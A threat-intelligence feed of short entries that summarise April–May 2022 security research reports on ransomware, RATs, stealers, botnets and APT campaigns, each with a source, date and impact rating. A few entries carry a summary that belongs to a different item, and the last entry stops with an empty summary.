Threat_Actors_exploiting_VMware_vulnerability
Medium
- Intel Source: CISA
- Intel Name: Threat_Actors_exploiting_VMware_vulnerability
- Date of Scan: 2022-05-20
- Impact: Medium
- Summary: CISA released an advisory to warn organizations about threat actors exploiting unpatched VMware vulnerabilities. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.
All_about_ITG23_Crypters
Medium
- Intel Source: Security Intelligence
- Intel Name: All_about_ITG23_Crypters
- Date of Scan: 2022-05-20
- Impact: Medium
- Summary: IBM X-Force researchers analyzed thirteen crypters that have all been used with malware built or operated by ITG23 internal teams or third-party distributors — including Trickbot, BazarLoader, Conti, and Colibri.
BumbleBee_Malware_getting_delivered_via_TransferXL_Urls
Low
- Intel Source: ISC.SANS
- Intel Name: BumbleBee_Malware_getting_delivered_via_TransferXL_Urls
- Date of Scan: 2022-05-20
- Impact: Low
- Summary: Researchers at ISC.SANS linked Bumblebee malware to the EXOTIC LILY threat actor after observing active TransferXL URLs delivering ISO files for Bumblebee.
Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms
Medium
- Intel Source: PtSecurity
- Intel Name: Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms
- Date of Scan: 2022-05-20
- Impact: Medium
- Summary: Analysts at Positive Technologies identified a previously unknown Chinese hacking group, which they dubbed 'Space Pirates', targeting enterprises in the Russian aerospace industry with phishing emails that install novel malware on their systems.
Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity
Medium
- Intel Source: WeiXin
- Intel Name: Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity
- Date of Scan: 2022-05-20
- Impact: Medium
- Summary: Researchers from 360 Threat Intelligence Center came across attack activity by APT-C-24/SideWinder in which the threat actor uses new TTPs.
Lazarus_Group_Exploiting_Log4Shell_Vulnerability
Medium
- Intel Source: Asec
- Intel Name: Lazarus_Group_Exploiting_Log4Shell_Vulnerability
- Date of Scan: 2022-05-20
- Impact: Medium
- Summary: Researchers from ASEC discovered the Lazarus group distributing NukeSped by exploiting the Log4Shell vulnerability. The threat actor used the log4j vulnerability against VMware Horizon products that had not received the security patch.
VMware_Bugs_Abused_to_Deliver_Mirai
Medium
- Intel Source: Barracuda
- Intel Name: VMware_Bugs_Abused_to_Deliver_Mirai
- Date of Scan: 2022-05-19
- Impact: Medium
- Summary: Researchers from Barracuda discovered attempts to exploit the recent vulnerabilities CVE-2022-22954 and CVE-2022-22960. Mirai was being delivered by abusing these VMware bugs.
Threat Actors targets US Business Online Checkout Page
Medium
- Intel Source: Palo Alto
- Intel Name: Threat Actors targets US Business Online Checkout Page
- Date of Scan: 2022-05-19
- Impact: Medium
- Summary: Researchers from Palo Alto Networks documented the background on Emotet and its activity from November 2021 through January 2022.
Emotet_The_journey
Medium
- Intel Source: Palo Alto
- Intel Name: Emotet_The_journey
- Date of Scan: 2022-05-19
- Impact: Medium
- Summary: Researchers from Palo Alto Networks documented the background on Emotet and its activity from November 2021 through January 2022.
Uncovering_Kingminer_Botnet_Attack
Low
- Intel Source: Trend Micro
- Intel Name: Uncovering_Kingminer_Botnet_Attack
- Date of Scan: 2022-05-18
- Impact: Low
- Summary: Researchers from Trend Micro detail the TTPs of the Kingminer botnet. In 2020, threat actors deployed Kingminer to target SQL servers for cryptocurrency mining.
Wizard_Spider_Group_In_Depth_Analysis
Medium
- Intel Source: Prodaft
- Intel Name: Wizard_Spider_Group_In_Depth_Analysis
- Date of Scan: 2022-05-18
- Impact: Medium
- Summary: Researchers from PRODAFT published the results of an investigation into Wizard Spider, believed to either be or be associated with the Grim Spider and Lunar Spider hacking groups.
Chaos_Ransomware_stands_with_Russia
Medium
- Intel Source: Fortinet
- Intel Name: Chaos_Ransomware_stands_with_Russia
- Date of Scan: 2022-05-18
- Impact: Medium
- Summary: FortiGuard Labs came across a variant of the Chaos ransomware that appears to side with Russia. This variant of the ransomware has been leveraging the Russia-Ukraine conflict.
Operation RestyLink targeting Japanese Firms
Medium
- Intel Source: NTT Security
- Intel Name: Operation RestyLink targeting Japanese Firms
- Date of Scan: 2022-05-18
- Impact: Medium
- Summary: Researchers from NTT Security observed an APT campaign targeting Japanese companies starting in mid-April 2022. The initial attack vector in this campaign was spear-phishing email.
RansomEXX_and_its_TTPs
Medium
- Intel Source: Trend Micro
- Intel Name: RansomEXX_and_its_TTPs
- Date of Scan: 2022-05-18
- Impact: Medium
- Summary: Researchers from Trend Micro shed light on the tactics and techniques of the ransomware variant called RansomEXX, which has been active since 2020.
X_Cart_Skimmer_with_DOM_based_Obfuscation
Low
- Intel Source: Sucuri
- Intel Name: X_Cart_Skimmer_with_DOM_based_Obfuscation
- Date of Scan: 2022-05-18
- Impact: Low
- Summary: A security researcher from Sucuri worked on an infected X-Cart website and found two interesting credit card stealers there — one skimmer located server-side, the other client-side.
UpdateAgent_Returns_with_New_macOS_Malware_Dropper
Low
- Intel Source: Jamf
- Intel Name: UpdateAgent_Returns_with_New_macOS_Malware_Dropper
- Date of Scan: 2022-05-17
- Impact: Low
- Summary: Researchers from Jamf Threat Labs came across a new variant of the macOS malware tracked as UpdateAgent. The malware relies on AWS infrastructure to host its various payloads and to report its infection status to the server.
Analysis_of_the_HUI_Loader
Low
- Intel Source: JPCERT
- Intel Name: Analysis_of_the_HUI_Loader
- Date of Scan: 2022-05-17
- Impact: Low
- Summary: JPCERT researchers shared their analysis of the HUI Loader, which has been used by multiple attack groups, including APT10, since around 2015.
Custom_PowerShell_RAT_targets_Germans
Low
- Intel Source: MalwareBytes
- Intel Name: Custom_PowerShell_RAT_targets_Germans
- Date of Scan: 2022-05-17
- Impact: Low
- Summary: Researchers from Malwarebytes came across a new campaign that plays on current concerns, luring Germans with the promise of updates on the threat situation in Ukraine and then infecting the victims with a RAT.
UN_social_program_themed_online_fraud
Medium
- Intel Source: CERT-UA
- Intel Name: UN_social_program_themed_online_fraud
- Date of Scan: 2022-05-17
- Impact: Medium
- Summary: CERT-UA researchers recently responded to the discovery of a fraudulent Facebook page that mimics the resource of the TV channel "TSN".
Onyx_Ransomware
Low
- Intel Source: Cyfirma
- Intel Name: Onyx_Ransomware
- Date of Scan: 2022-05-17
- Impact: Low
- Summary: Researchers from Cyfirma analyzed samples of a new ransomware called Onyx which was first seen in April 2022. This ransomware encrypts files and then modifies their filenames by appending the .ampkcz extension.
Malicious_HTML_Help_File_Delivering_Agent_Tesla
Low
- Intel Source: Palo Alto
- Intel Name: Malicious_HTML_Help_File_Delivering_Agent_Tesla
- Date of Scan: 2022-05-17
- Impact: Low
- Summary: Unit 42 researchers observed an attack utilizing malicious compiled HTML help files for the initial delivery. The method was used to deliver Agent Tesla.
APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe
Medium
- Intel Source: Cluster25
- Intel Name: APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe
- Date of Scan: 2022-05-16
- Impact: Medium
- Summary: Cluster25 researchers analyzed several spear-phishing campaigns linked to APT29 that involve the use of a side-loaded DLL through signed software (like the Adobe suite) and legitimate web services (like Dropbox) as a communication vector for Command and Control (C&C).
Quantum_Locker_Ransomware
Medium
- Intel Source: Cybereason
- Intel Name: Quantum_Locker_Ransomware
- Date of Scan: 2022-05-16
- Impact: Medium
- Summary: Researchers at Cybereason analyzed Quantum Locker ransomware and demonstrated its detection and prevention. The initial infection method used by the operators is the infamous IcedID malware.
KurayStealer_Malware
Low
- Intel Source: Uptycs
- Intel Name: KurayStealer_Malware
- Date of Scan: 2022-05-16
- Impact: Low
- Summary: Researchers at Uptycs came across a new malware builder dubbed KurayStealer that has password-stealing and screenshot capabilities. The malware harvests passwords and screenshots and sends them to the attackers' Discord channel via webhooks.
From_0_Day_to_Mirai
High
- Intel Source: ISC.SANS
- Intel Name: From_0_Day_to_Mirai
- Date of Scan: 2022-05-16
- Impact: High
- Summary: Researchers at ISC.SANS found attacks exploiting the recent high severity vulnerability in F5 products and were able to attribute the attacks to Mirai.
Telegram_used_to_spread_Eternity_Malware
Low
- Intel Source: Cyble
- Intel Name: Telegram_used_to_spread_Eternity_Malware
- Date of Scan: 2022-05-16
- Impact: Low
- Summary: Researchers from Cyble came across a new malware service, dubbed the Eternity Project by the threat actors behind it, which allows cybercriminals to target potential victims with a customized threat offering based on individual modules.
Novel IceApple Post-Exploitation Framework
Low
- Intel Source: CrowdStrike
- Intel Name: Novel IceApple Post-Exploitation Framework
- Date of Scan: 2022-05-16
- Impact: Low
- Summary: Researchers from CrowdStrike found a new post-exploitation framework, dubbed IceApple, being deployed on Microsoft Exchange servers.
APT34_targets_Jordan_Government_using_new_Saitama_backdoor
Medium
- Intel Source: MalwareBytes
- Intel Name: APT34_targets_Jordan_Government_using_new_Saitama_backdoor
- Date of Scan: 2022-05-13
- Impact: Medium
- Summary: Researchers at Malwarebytes discovered a malicious email targeting a government official at Jordan's foreign ministry; the suspicious message was identified on April 26. It contained a malicious Excel document that delivered Saitama, a new hacking tool used to provide a backdoor into systems. Malwarebytes attributed the email to a threat group commonly known as APT34.
RedLine_Stealer_Campaign_spread_via_Github_hosted_payload
Medium
- Intel Source: NetSkope
- Intel Name: RedLine_Stealer_Campaign_spread_via_Github_hosted_payload
- Date of Scan: 2022-05-13
- Impact: Medium
- Summary: Researchers at Netskope Threat Labs discovered a new RedLine Stealer campaign spread on YouTube, using a fake bot to buy Mystery Box NFTs from Binance. The video description leads the victim to download the fake bot, which is hosted on GitHub.
Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC
Low
- Intel Source: Fortinet
- Intel Name: Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC
- Date of Scan: 2022-05-13
- Impact: Low
- Summary: Researchers at Fortinet's FortiGuard Labs analysed a phishing campaign that was delivering three pieces of fileless malware onto a victim's device. Once executed, the malware is able to steal sensitive information from that device. It mainly affects Microsoft Windows platform users.
Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US
Medium
- Intel Source: SecureWorks
- Intel Name: Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US
- Date of Scan: 2022-05-13
- Impact: Medium
- Summary: SecureWorks Counter Threat Unit analysed REvil ransomware samples, which indicate that GOLD SOUTHFIELD has resumed operations. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.
UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware
Medium
- Intel Source: CERT-UA
- Intel Name: UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware
- Date of Scan: 2022-05-13
- Impact: Medium
- Summary: CERT-UA analysed a phishing campaign with the subject "On revenge in Kherson!" and an attachment in the form of a file "Plan Kherson.htm". The campaign uses the malicious program GammaLoad.PS1_v2 and is attributed to the group UAC-0010 (Armageddon).
TA578_distributing_Bumblebee_malware
Medium
- Intel Source: ISC.SANS
- Intel Name: TA578_distributing_Bumblebee_malware
- Date of Scan: 2022-05-12
- Impact: Medium
- Summary: Researchers at ISC.SANS analysed a campaign in which the threat actor TA578 leverages thread-hijacked emails to push ISO files for Bumblebee malware. These thread-hijacked emails contain links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign.
Critical_F5_BIG_IP_Vulnerability_New_IoCs
High
- Intel Source: Palo Alto
- Intel Name: Critical_F5_BIG_IP_Vulnerability_New_IoCs
- Date of Scan: 2022-05-12
- Impact: High
- Summary: Researchers from Palo Alto have released a few indicators of compromise and their view on the critical F5 BIG-IP vulnerability.
Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK
Low
- Intel Source: Proofpoint
- Intel Name: Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK
- Date of Scan: 2022-05-12
- Impact: Low
- Summary: Proofpoint researchers found a previously undocumented remote access trojan (RAT) called Nerbian RAT, written in the Go programming language, that has been spotted disproportionately targeting entities in Italy, Spain, and the U.K.
Bitter APT expands its target list
Medium
- Intel Source: Cisco Talos
- Intel Name: Bitter APT expands its target list
- Date of Scan: 2022-05-12
- Impact: Medium
- Summary: An espionage-focused threat actor (Bitter APT) known for targeting China, Pakistan, and Saudi Arabia has included Bangladeshi government organizations in an ongoing campaign.
Malicious_NPM_Packages_targets_German_Companies
Low
- Intel Source: JFrog
- Intel Name: Malicious_NPM_Packages_targets_German_Companies
- Date of Scan: 2022-05-12
- Impact: Low
- Summary: Researchers from JFrog discovered a number of malicious packages in the NPM registry specifically targeting several prominent companies based in Germany to carry out supply chain attacks.
Examining_BlackBasta_ransomware
Medium
- Intel Source: Trend Micro
- Intel Name: Examining_BlackBasta_ransomware
- Date of Scan: 2022-05-11
- Impact: Medium
- Summary: Trend Micro researchers have examined the whole infection routine of Black Basta ransomware and its infection tactics.
German_Automakers_targeted_by_InfoStealer_campaign
Low
- Intel Source: Check Point
- Intel Name: German_Automakers_targeted_by_InfoStealer_campaign
- Date of Scan: 2022-05-11
- Impact: Low
- Summary: Check Point researchers discovered a years-long phishing campaign that has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.
REvil_returns_reemerging_GOLD_SOUTHFIELD
High
- Intel Source: SecureWorks
- Intel Name: REvil_returns_reemerging_GOLD_SOUTHFIELD
- Date of Scan: 2022-05-11
- Impact: High
- Summary: SecureWorks Counter Threat Unit analysed REvil ransomware samples, which indicate that GOLD SOUTHFIELD has resumed operations. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.
Different_elements_of_Cobalt_Strike
Medium
- Intel Source: Palo Alto
- Intel Name: Different_elements_of_Cobalt_Strike
- Date of Scan: 2022-05-11
- Impact: Medium
- Summary: Palo Alto Unit 42 researchers analysed the Cobalt Strike tool, walked through its encoding algorithm, described the definitions of and differences between the encoding types used in the Cobalt Strike framework, and covered some malicious attacks seen in the wild.
New_Wave_of_Ursnif_Malware
High
- Intel Source: Qualys
- Intel Name: New_Wave_of_Ursnif_Malware
- Date of Scan: 2022-05-11
- Impact: High
- Summary: Researchers at Qualys discovered and analysed a few phishing emails in which a macro-embedded XLS attachment or a zip attachment containing an HTA file initiated the infection chain. Researchers attributed this targeted attack to the Ursnif malware, one of the most widespread banking trojans.
SunnyDay Ransomware
LOW
- Intel Source: Seguranca-Informatica
- Intel Name: SunnyDay Ransomware
- Date of Scan: 2022-04-19
- Impact: LOW
- Summary: Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. The work found some similarities with other ransomware samples such as Ever101, Medusa Locker, Curator and Payment45. According to the analysis, “SunnyDay is a simple piece of ransomware based on the SALSA20 stream cipher”. SALSA20 is easy to recognize as it uses well-known values for its internal cryptographic operations.
Coordinated disruption of Zloader operation
LOW
- Intel Source: Microsoft/ESET
- Intel Name: Coordinated disruption of Zloader operation
- Date of Scan: 2022-04-19
- Impact: LOW
- Summary: Microsoft's DCU has taken technical action against Zloader and disrupted its operations. ZLoader is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money.
Lazarus Group Targets Chemical Sector
MEDIUM
- Intel Source: Symantec
- Intel Name: Lazarus Group Targets Chemical Sector
- Date of Scan: 2022-04-19
- Impact: MEDIUM
- Summary: Researchers from Symantec have observed the Lazarus group conducting an espionage campaign targeting organizations operating within the chemical sector. This campaign has been dubbed Operation Dream Job.
Recent Emotet Maldoc Outbreak
MEDIUM
- Intel Source: Fortinet
- Intel Name: Recent Emotet Maldoc Outbreak
- Date of Scan: 2022-04-19
- Impact: MEDIUM
- Summary: Researchers at Fortinet identified a recent Emotet outbreak being spread through a variety of malicious Microsoft Office files, or maldocs, attached to phishing emails. Once a victim opens the attached document, a VBA macro or Excel 4.0 macro is used to execute malicious code that downloads and runs the Emotet malware.
XSS Vulnerability in Zimbra leveraged to target Ukraine Government
MEDIUM
- Intel Source: CERT-UA
- Intel Name: XSS Vulnerability in Zimbra leveraged to target Ukraine Government
- Date of Scan: 2022-04-18
- Impact: MEDIUM
- Summary: CERT-UA detected threat actors targeting Ukrainian government agencies with new attacks exploiting a Zimbra XSS vulnerability (CVE-2018-6882). CERT-UA attributed this campaign to UAC-0097, a currently unknown actor.
CVE_2022_24527_Seeder_Queries_14042022
MEDIUM
- Intel Source: STR
- Intel Name: CVE_2022_24527_Seeder_Queries_14042022
- Date of Scan: 2022-04-18
- Impact: MEDIUM
- Summary: This research is part of Securonix Threat Labs - Threat Research Team.
In-depth analysis of PYSA Ransomware Group
MEDIUM
- Intel Source: Prodaft
- Intel Name: In-depth analysis of PYSA Ransomware Group
- Date of Scan: 2022-04-18
- Impact: MEDIUM
- Summary: Researchers at PRODAFT identified and gained visibility into PYSA's ransomware infrastructure and analyzed their findings to gain insight into how the criminal operation works.
BumbleBee Malware campaign
LOW
- Intel Source: Cynet
- Intel Name: BumbleBee Malware campaign
- Date of Scan: 2022-04-18
- Impact: LOW
- Summary: Researchers from Cynet Security found a new campaign which, instead of using malicious Office documents, uses malicious ISO image files to lure victims into executing the BumbleBee malware.
New Fodcha DDoS botnet
MEDIUM
- Intel Source: netlab360
- Intel Name: New Fodcha DDoS botnet
- Date of Scan: 2022-04-18
- Impact: MEDIUM
- Summary: Researchers at Qihoo 360's Network Security Research Lab discovered a new DDoS botnet called 'Fodcha'. The botnet spread to over 62,000 devices between March 29 and April 10, and based on the unique IP addresses linked to the botnet, researchers track a 10,000-strong Fodcha army of bots using Chinese IP addresses every day.
CVE_2022_22954_Seeder_Queries_14042022
MEDIUM
- Intel Source: STR
- Intel Name: CVE_2022_22954_Seeder_Queries_14042022
- Date of Scan: 2022-04-18
- Impact: MEDIUM
- Summary: This research is part of Securonix Threat Labs - Threat Research Team.
Emotet Modules and Recent Attacks
MEDIUM
- Intel Source: SecureList
- Intel Name: Emotet Modules and Recent Attacks
- Date of Scan: 2022-04-18
- Impact: MEDIUM
- Summary: Researchers from Kaspersky were able to retrieve 10 of the 16 modules used by Emotet for credential/password/account/e-mail stealing and spamming. Statistics on recent Emotet attacks were also shared.
New File extensions added to BlackCat ransomware's arsenal
MEDIUM
- Intel Source: SecureList
- Intel Name: New File extensions added to BlackCat ransomware's arsenal
- Date of Scan: 2022-04-18
- Impact: MEDIUM
- Summary: Researchers at SecureList analysed the BlackCat ransomware group's activities since its inception and compared BlackCat's TTPs with those of the BlackMatter group, such as a custom exfiltration tool called 'Fendr' that had previously been used exclusively in BlackMatter ransomware activity.
Enemybot leveraged by Keksec group
MEDIUM
- Intel Source: Fortinet
- Intel Name: Enemybot leveraged by Keksec group
- Date of Scan: 2022-04-14
- Impact: MEDIUM
- Summary: Researchers at FortiGuard Labs have identified a new DDoS botnet called “Enemybot” and attributed it to a threat group called 'Keksec' that specializes in cryptomining and DDoS attacks. This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
Critical Remote Code Execution Vulnerability in Windows RPC Runtime
HIGH
- Intel Source: Microsoft
- Intel Name: Critical Remote Code Execution Vulnerability in Windows RPC Runtime
- Date of Scan: 2022-04-14
- Impact: HIGH
- Summary: Microsoft's April 2022 Patch Tuesday introduced patches for more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in the Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492, CVE-2022-24528 and CVE-2022-26809. By exploiting these vulnerabilities, a remote unauthenticated attacker can execute code on the vulnerable machine with the privileges of the RPC service, which depends on the process hosting the RPC runtime.
Virus/XLS Xanpei Infecting Excel Files
MEDIUM
- Intel Source: ASEC
- Intel Name: Virus/XLS Xanpei Infecting Excel Files
- Date of Scan: 2022-04-14
- Impact: MEDIUM
- Summary: The ASEC research team identified a constant distribution of malware strains that spread the infection when an Excel file is opened. Upon opening the infected Excel file, a file containing the virus VBA code is dropped into the Excel startup path. Whenever any Excel file is subsequently opened, the malicious file dropped in the Excel startup path is automatically executed to infect it with the virus and perform additional malicious behaviors.
IcedID malware targeting Ukraine state bodies
MEDIUM
- Intel Source: CERT-UA
- Intel Name: IcedID malware targeting Ukraine state bodies
- Date of Scan: 2022-04-14
- Impact: MEDIUM
- Summary: CERT-UA issued a new heads-up warning of an ongoing cyber-attack leveraging the infamous IcedID malware to compromise Ukrainian state bodies. The detected malware, also known as BankBot or BokBot, is a banking Trojan primarily designed to target financial data and steal banking credentials.
ZingoStealer by Haskers Group
MEDIUM
- Intel Source: Cisco Talos
- Intel Name: ZingoStealer by Haskers Group
- Date of Scan: 2022-04-14
- Impact: MEDIUM
- Summary: Researchers at Cisco Talos identified a new information stealer called 'ZingoStealer' that has been released for free by a threat actor known as 'Haskers Gang'. This information stealer, first introduced to the wild in March 2022, is currently undergoing active development, and multiple releases of new versions have been observed recently.
Malware Campaigns Targeting African Banking Sector
MEDIUM
- Intel Source: HP Wolf Security
- Intel Name: Malware Campaigns Targeting African Banking Sector
- Date of Scan: 2022-04-14
- Impact: MEDIUM
- Summary: A cybercrime campaign targeting the African banking sector is leveraging phishing emails and HTML smuggling techniques to deploy malware. Researchers from HP Wolf Security have been tracking the campaign since early 2022, when an employee of an unnamed West African bank received an email purporting to be from a recruiter at another African bank with information about job opportunities.
OldGremlin Gang resumes attack with new methods
MEDIUM
- Intel Source: Group-IB
- Intel Name: OldGremlin Gang resumes attack with new methods
- Date of Scan: 2022-04-14
- Impact: MEDIUM
- Summary: Group-IB uncovered new attack tools and methods used by the OldGremlin ransomware group. The group was first identified by Group-IB researchers in spring 2020, and over the past two years OldGremlin has conducted 13 malicious email campaigns. Researchers also discovered two variants of the TinyFluff malware: an earlier one that is more complex, and a newer simplified version that copies the script and the Node.js interpreter from its storage location.
SystemBC Malware
MEDIUM
- Intel Source: ASEC
- Intel Name: SystemBC Malware
- Date of Scan: 2022-04-12
- Impact: MEDIUM
- Summary: The ASEC research team identified a proxy malware called SystemBC that has been used by various attackers for the last few years. While it has recently been distributed through SmokeLoader or Emotet, this malware has steadily been used in various ransomware attacks in the past.
NetSupport RAT_Seeder_Queries_08/04/2022
MEDIUM
- Intel Source: STR
- Intel Name: NetSupport RAT_Seeder_Queries_08/04/2022
- Date of Scan: 2022-04-12
- Impact: MEDIUM
- Summary: This research is part of Securonix Threat Labs - Threat Research Team.
New version of SolarMarker Malware
MEDIUM
- Intel Source: Palo Alto
- Intel Name: New version of SolarMarker Malware
- Date of Scan: 2022-04-12
- Impact: MEDIUM
- Summary: A new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, has been identified by Palo Alto Networks and is believed to be active as of April 2022. This malware has been prevalent since September 2020, targeting U.S. organizations; part of the infrastructure is still active as of 2022, in addition to new infrastructure that attackers have recently deployed.
Fake COVID-19 forms targeting companies
MEDIUM
- Intel Source: Cofense
- Intel Name: Fake COVID-19 forms targeting companies
- Date of Scan: 2022-04-12
- Impact: MEDIUM
- Summary: Cofense Phishing Defense Center analysed a phishing campaign where threat actors impersonate companies to send out fake COVID-19 forms. The CPDC team saw a phishing email masquerading as a general office-wide email claiming someone in the building has been infected with COVID-19 and asking recipients to review the company policy.
Bahamut group recent attacks
MEDIUM
- Intel Source: 360 Beacon Lab
- Intel Name: Bahamut group recent attacks
- Date of Scan: 2022-04-12
- Impact: MEDIUM
- Summary: Researchers at 360 Beacon Lab identified a suspected mobile terminal attack activity of the Bahamut group. Bahamut is an advanced threat group targeting the Middle East and South Asia. The group mainly uses phishing websites, fake news websites and social networking sites to attack.
MoqHao Malware targeting European countries
LOW
- Intel Source: TeamCymru
- Intel Name: MoqHao Malware targeting European countries
- Date of Scan: 2022-04-12
- Impact: LOW
- Summary: Researchers at Team Cymru examined the current target base of the Roaming Mantis group, which is leveraging MoqHao malware to target European countries. MoqHao is generally used to target Android users, often via an initial attack vector of smishing.
Tarrask - HAFNIUM APT defense evasion malware
MEDIUM
- Intel Source: Microsoft
- Intel Name: Tarrask - HAFNIUM APT defense evasion malware
- Date of Scan: 2022-04-12
- Impact: MEDIUM
- Summary: Microsoft Threat Intelligence Center has tracked the Chinese-backed Hafnium hacking group and identified that the group has been linked to a piece of new malware used to maintain persistence in compromised Windows environments. MSTIC dubbed the defense evasion malware 'Tarrask' and characterized it as a tool that creates 'hidden' scheduled tasks on the system.
EvilNominatus Ransomware
LOW
- Intel Source: ClearSky
- Intel Name: EvilNominatus Ransomware
- Date of Scan: 2022-04-12
- Impact: LOW
- Summary: Researchers at ClearSky detected a malicious BAT file that was uploaded to VirusTotal from Iran. This file executes a ransomware associated with the EvilNominatus ransomware initially exposed at the end of 2021. Researchers believe that the ransomware's developer is a young Iranian who bragged about its development on Twitter.
Sandworm Group (UAC-0082) targeting Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER
MEDIUM
- Intel Source: CERT-UA
- Intel Name: Sandworm Group (UAC-0082) targeting Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER
- Date of Scan: 2022-04-12
- Impact: MEDIUM
- Summary: CERT-UA has taken urgent measures to respond to an information security incident related to a targeted attack on a Ukrainian energy facility.
FFDroider Stealer Targeting Social Media Platforms
LOW
- Intel Source: Zscaler
- Intel Name: FFDroider Stealer Targeting Social Media Platforms
- Date of Scan: 2022-04-11
- Impact: LOW
- Summary: Researchers from Zscaler discovered many new types of stealer malware across different attack campaigns, including a novel Windows-based malware that creates a registry key dubbed FFDroider and is designed to send stolen credentials and cookies to a C&C server.
Multiple cyber espionage operations disrupted
MEDIUM
- Intel Source: Meta
- Intel Name: Multiple cyber espionage operations disrupted
- Date of Scan: 2022-04-11
- Impact: MEDIUM
- Summary: Meta shared their Adversarial Threat Report, which provides a broader view into the cyber threats Facebook observes in Iran, Azerbaijan, Ukraine, Russia, South America and the Philippines.
DPRK-Nexus threat actor spear-phishing campaign
LOW
- Intel Source: Cluster25
- Intel Name: DPRK-Nexus threat actor spear-phishing campaign
- Date of Scan: 2022-04-11
- Impact: LOW
- Summary: Researchers at Cluster25 identified recent activity, started in the early days of April 2022, from a DPRK-nexus threat actor using spear-phishing emails containing Korean-based malicious documents with different lures to compromise its victims.
Denonia Malware specifically targeting AWS Lambda
MEDIUM
+
—
- Intel Source:
- Cado security
- Intel Name:
- Denonia Malware specifically targeting AWS Lambda
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Researchers from Cado Security published their findings on a new malware variant called 'Denonia' that targets AWS Lambda. After further investigation, the researchers found the sample was a 64-bit ELF executable. The malware also relies on third-party GitHub libraries, including those for writing Lambda functions and retrieving data from Lambda invoke requests.
Mirai Botnet exploiting Spring4Shell Vulnerability
MEDIUM
- Intel Source:
- Trend Micro
- Intel Name:
- Mirai Botnet exploiting Spring4Shell Vulnerability
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- The Trend Micro Research team has confirmed earlier reports that the new Spring4Shell vulnerability has been exploited by the Mirai botnet. The Mirai sample is downloaded to the '/tmp' folder and executed after its permissions are changed with 'chmod' to make it executable.
Remcos RAT phishing campaign
LOW
- Intel Source:
- Fortinet
- Intel Name:
- Remcos RAT phishing campaign
- Date of Scan:
- 2022-04-08
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs share their analysis of the Remcos RAT, delivered by a phishing campaign and used by malicious actors to control victims' devices.
Parrot TDS takes over compromised websites
MEDIUM
- Intel Source:
- Avast
- Intel Name:
- Parrot TDS takes over compromised websites
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Avast researchers have published a report stating that a new traffic direction system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch further malicious campaigns. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites and personal websites to university and local government sites.
Operation Bearded Barbie
MEDIUM
- Intel Source:
- Cybereason
- Intel Name:
- Operation Bearded Barbie
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Cybereason discovered a new APT-C-23 campaign targeting a group of high-profile Israeli targets working for sensitive defense, law enforcement, and emergency services organizations. The investigation revealed that APT-C-23 has effectively upgraded its malware arsenal with new tools dubbed Barb(ie) Downloader and BarbWire Backdoor.
UAC-0010 group/Armageddon targeting Ukraine government
MEDIUM
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0010 group/Armageddon targeting Ukraine government
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
UAC-0010 group/Armageddon targeting European Union institutions
MEDIUM
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0010 group/Armageddon targeting European Union institutions
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
Chinese APT targets Indian Power Grid
MEDIUM
- Intel Source:
- Recorded Future
- Intel Name:
- Chinese APT targets Indian Power Grid
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Recorded Future have found continued targeting of the Indian power grid by a Chinese state-sponsored activity group, likely intended to enable information gathering about critical infrastructure systems.
Windows MetaStealer Malware
MEDIUM
- Intel Source:
- ISC.SANS
- Intel Name:
- Windows MetaStealer Malware
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers at SANS have analysed 16 samples of Excel files submitted to VirusTotal on 30-03-2022; these Excel files are distributed as email attachments. Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity.
Malicious Word Documents Using MS Media Player
LOW
- Intel Source:
- ASEC
- Intel Name:
- Malicious Word Documents Using MS Media Player
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
